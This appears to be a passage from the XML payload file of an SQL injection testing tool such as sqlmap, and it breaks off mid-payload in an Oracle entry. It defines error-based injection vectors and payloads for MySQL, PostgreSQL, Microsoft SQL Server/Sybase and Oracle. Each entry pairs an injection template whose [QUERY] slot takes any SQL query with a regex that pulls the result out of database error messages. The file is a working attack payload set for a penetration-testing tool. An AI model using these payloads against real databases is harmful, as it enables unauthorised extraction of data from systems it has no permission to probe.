<?xml version="1.0" encoding="UTF-8"?>12<root>3<!-- Error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->4<test>5<title>MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)</title>6<stype>2</stype>7<level>4</level>8<risk>1</risk>9<clause>1,2,3,8,9</clause>10<where>1</where>11<vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>12<request>13<!-- These work as good as ELT(), but are longer14<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>15<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>16-->17<payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>18</request>19<response>20<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>21</response>22<details>23<dbms>MySQL</dbms>24<dbms_version>>= 5.5</dbms_version>25</details>26</test>2728<test>29<!-- It does not work against ORDER BY or GROUP BY clause -->30<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>31<stype>2</stype>32<level>4</level>33<risk>3</risk>34<clause>1,8,9</clause>35<where>1</where>36<vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>37<request>38<!-- These work as good as ELT(), but are longer39<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 
END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>40<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>41-->42<payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>43</request>44<response>45<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>46</response>47<details>48<dbms>MySQL</dbms>49<dbms_version>>= 5.5</dbms_version>50</details>51</test>5253<test>54<title>MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)</title>55<stype>2</stype>56<level>4</level>57<risk>1</risk>58<clause>1,2,3,8,9</clause>59<where>1</where>60<vector>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>61<request>62<payload>AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>63</request>64<response>65<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>66</response>67<details>68<dbms>MySQL</dbms>69<dbms_version>>= 5.5</dbms_version>70</details>71</test>7273<test>74<title>MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)</title>75<stype>2</stype>76<level>4</level>77<risk>3</risk>78<clause>1,8,9</clause>79<where>1</where>80<vector>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>81<request>82<payload>OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>83</request>84<response>85<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>86</response>87<details>88<dbms>MySQL</dbms>89<dbms_version>>= 
5.5</dbms_version>90</details>91</test>9293<test>94<title>MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)</title>95<stype>2</stype>96<level>4</level>97<risk>1</risk>98<clause>1,2,3,8,9</clause>99<where>1</where>100<vector>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>101<request>102<payload>AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>103</request>104<response>105<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>106</response>107<details>108<dbms>MySQL</dbms>109<dbms_version>>= 5.6</dbms_version>110</details>111</test>112113<test>114<title>MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)</title>115<stype>2</stype>116<level>4</level>117<risk>3</risk>118<clause>1,8,9</clause>119<where>1</where>120<vector>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>121<request>122<payload>OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>123</request>124<response>125<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>126</response>127<details>128<dbms>MySQL</dbms>129<dbms_version>>= 5.6</dbms_version>130</details>131</test>132133<test>134<title>MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)</title>135<stype>2</stype>136<level>5</level>137<risk>1</risk>138<clause>1,2,3,8,9</clause>139<where>1</where>140<vector>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>141<request>142<payload>AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING 
utf8)))</payload>143</request>144<response>145<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>146</response>147<details>148<dbms>MySQL</dbms>149<dbms_version>>= 5.7.8</dbms_version>150</details>151</test>152153<test>154<!-- It does not work against ORDER BY or GROUP BY clause -->155<title>MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)</title>156<stype>2</stype>157<level>5</level>158<risk>3</risk>159<clause>1,8,9</clause>160<where>1</where>161<vector>OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>162<request>163<payload>OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>164</request>165<response>166<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>167</response>168<details>169<dbms>MySQL</dbms>170<dbms_version>>= 5.7.8</dbms_version>171</details>172</test>173174<test>175<title>MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>176<stype>2</stype>177<level>2</level>178<risk>1</risk>179<clause>1,2,3,8,9</clause>180<where>1</where>181<vector>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>182<request>183<!-- These work as good as ELT(), but are longer184<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>185<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>186-->187<payload>AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT 
(ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>188</request>189<response>190<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>191</response>192<details>193<dbms>MySQL</dbms>194<dbms_version>>= 5.0</dbms_version>195</details>196</test>197198<test>199<title>MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>200<stype>2</stype>201<level>2</level>202<risk>3</risk>203<clause>1,2,3,8,9</clause>204<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->205<where>1</where>206<vector>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>207<request>208<!-- These work as good as ELT(), but are longer209<payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>210<payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>211-->212<payload>OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>213</request>214<response>215<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>216</response>217<details>218<dbms>MySQL</dbms>219<dbms_version>>= 5.0</dbms_version>220</details>221</test>222223<test>224<title>MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause 
(FLOOR)</title>225<stype>2</stype>226<level>5</level>227<risk>1</risk>228<clause>7</clause>229<where>1</where>230<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>231<request>232<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>233</request>234<response>235<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>236</response>237<details>238<dbms>MySQL</dbms>239<dbms_version>>= 5.0</dbms_version>240</details>241</test>242243<test>244<title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>245<stype>2</stype>246<level>1</level>247<risk>1</risk>248<clause>1,2,3,8,9</clause>249<where>1</where>250<vector>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>251<request>252<!-- These work as good as ELT(), but are longer253<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>254<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>255-->256<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>257</request>258<response>259<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>260</response>261<details>262<dbms>MySQL</dbms>263<dbms_version>>= 5.1</dbms_version>264</details>265</test>266267<test>268<title>MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>269<stype>2</stype>270<level>1</level>271<risk>3</risk>272<clause>1,2,3,8,9</clause>273<!-- Despite this is an OR payload, keep where to 
1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->274<where>1</where>275<vector>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>276<request>277<!-- These work as good as ELT(), but are longer278<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>279<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>280-->281<payload>OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>282</request>283<response>284<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>285</response>286<details>287<dbms>MySQL</dbms>288<dbms_version>>= 5.1</dbms_version>289</details>290</test>291292<test>293<title>MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>294<stype>2</stype>295<level>3</level>296<risk>1</risk>297<clause>1,2,3,8,9</clause>298<where>1</where>299<vector>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>300<request>301<!-- These work as good as ELT(), but are longer302<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>303<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>304-->305<payload>AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>306</request>307<response>308<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>309</response>310<details>311<dbms>MySQL</dbms>312<dbms_version>>= 
5.1</dbms_version>313</details>314</test>315316<test>317<title>MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)</title>318<stype>2</stype>319<level>3</level>320<risk>3</risk>321<clause>1,2,3,8,9</clause>322<!-- Despite this is an OR payload, keep where to 1 because otherwise it will not work when injecting in ORDER BY or GROUP BY -->323<where>1</where>324<vector>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>325<request>326<!-- These work as good as ELT(), but are longer327<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])</payload>328<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>329-->330<payload>OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>331</request>332<response>333<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>334</response>335<details>336<dbms>MySQL</dbms>337<dbms_version>>= 5.1</dbms_version>338</details>339</test>340341<test>342<title>MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)</title>343<stype>2</stype>344<level>3</level>345<risk>1</risk>346<clause>1,2,3,8,9</clause>347<where>1</where>348<vector>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>349<request>350<!-- These work as good as ELT(), but are longer351<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] 
UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>352<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>353-->354<payload>AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>355</request>356<response>357<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>358</response>359<details>360<dbms>MySQL</dbms>361<dbms_version>>= 4.1</dbms_version>362</details>363</test>364365<test>366<!-- It does not work against ORDER BY or GROUP BY clause -->367<title>MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)</title>368<stype>2</stype>369<level>3</level>370<risk>3</risk>371<clause>1,8,9</clause>372<where>1</where>373<vector>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</vector>374<request>375<!-- These work as good as ELT(), but are longer376<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>377<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY 
x)</payload>378-->379<payload>OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)</payload>380</request>381<response>382<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>383</response>384<details>385<dbms>MySQL</dbms>386<dbms_version>>= 4.1</dbms_version>387</details>388</test>389390<!-- This payload with AND does not work -->391<test>392<title>MySQL OR error-based - WHERE or HAVING clause (FLOOR)</title>393<stype>2</stype>394<level>4</level>395<risk>3</risk>396<clause>1,8,9</clause>397<where>2</where>398<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>399<request>400<payload>OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</payload>401<comment>#</comment>402</request>403<response>404<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>405</response>406<details>407<dbms>MySQL</dbms>408</details>409</test>410411<test>412<title>PostgreSQL AND error-based - WHERE or HAVING clause</title>413<stype>2</stype>414<level>1</level>415<risk>1</risk>416<clause>1,8,9</clause>417<where>1</where>418<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>419<request>420<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>421</request>422<response>423<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>424</response>425<details>426<dbms>PostgreSQL</dbms>427</details>428</test>429430<test>431<title>PostgreSQL OR error-based - WHERE or HAVING 
clause</title>432<stype>2</stype>433<level>1</level>434<risk>3</risk>435<clause>1,8,9</clause>436<where>2</where>437<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>438<request>439<payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)</payload>440</request>441<response>442<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>443</response>444<details>445<dbms>PostgreSQL</dbms>446</details>447</test>448449<test>450<title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)</title>451<stype>2</stype>452<level>1</level>453<risk>1</risk>454<clause>1,8,9</clause>455<where>1</where>456<vector>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>457<request>458<payload>AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>459</request>460<response>461<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>462</response>463<details>464<dbms>Microsoft SQL Server</dbms>465<dbms>Sybase</dbms>466</details>467</test>468469<test>470<title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)</title>471<stype>2</stype>472<level>2</level>473<risk>3</risk>474<clause>1,8,9</clause>475<where>2</where>476<vector>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>477<request>478<payload>OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>479</request>480<response>481<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>482</response>483<details>484<dbms>Microsoft SQL Server</dbms>485<dbms>Sybase</dbms>486</details>487</test>488489<test>490<title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause 
(CONVERT)</title>491<stype>2</stype>492<level>2</level>493<risk>1</risk>494<clause>1,8,9</clause>495<where>1</where>496<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>497<request>498<payload>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>499</request>500<response>501<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>502</response>503<details>504<dbms>Microsoft SQL Server</dbms>505<dbms>Sybase</dbms>506</details>507</test>508509<test>510<title>Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT)</title>511<stype>2</stype>512<level>3</level>513<risk>3</risk>514<clause>1,8,9</clause>515<where>2</where>516<vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>517<request>518<payload>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>519</request>520<response>521<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>522</response>523<details>524<dbms>Microsoft SQL Server</dbms>525<dbms>Sybase</dbms>526</details>527</test>528529<test>530<title>Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT)</title>531<stype>2</stype>532<level>2</level>533<risk>1</risk>534<clause>1,8,9</clause>535<where>1</where>536<vector>AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>537<request>538<payload>AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>539</request>540<response>541<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>542</response>543<details>544<dbms>Microsoft SQL Server</dbms>545<dbms>Sybase</dbms>546</details>547</test>548549<test>550<title>Microsoft SQL Server/Sybase OR error-based - WHERE or 
HAVING clause (CONCAT)</title>551<stype>2</stype>552<level>3</level>553<risk>3</risk>554<clause>1,8,9</clause>555<where>2</where>556<vector>OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')</vector>557<request>558<payload>OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]')</payload>559</request>560<response>561<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>562</response>563<details>564<dbms>Microsoft SQL Server</dbms>565<dbms>Sybase</dbms>566</details>567</test>568569<test>570<title>Oracle AND error-based - WHERE or HAVING clause (XMLType)</title>571<stype>2</stype>572<level>1</level>573<risk>1</risk>574<clause>1,9</clause>575<where>1</where>576<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>577<request>578<payload>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>579</request>580<response>581<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>582</response>583<details>584<dbms>Oracle</dbms>585</details>586</test>587588<test>589<title>Oracle OR error-based - WHERE or HAVING clause (XMLType)</title>590<stype>2</stype>591<level>1</level>592<risk>3</risk>593<clause>1,9</clause>594<where>2</where>595<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>596<request>597<payload>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM 
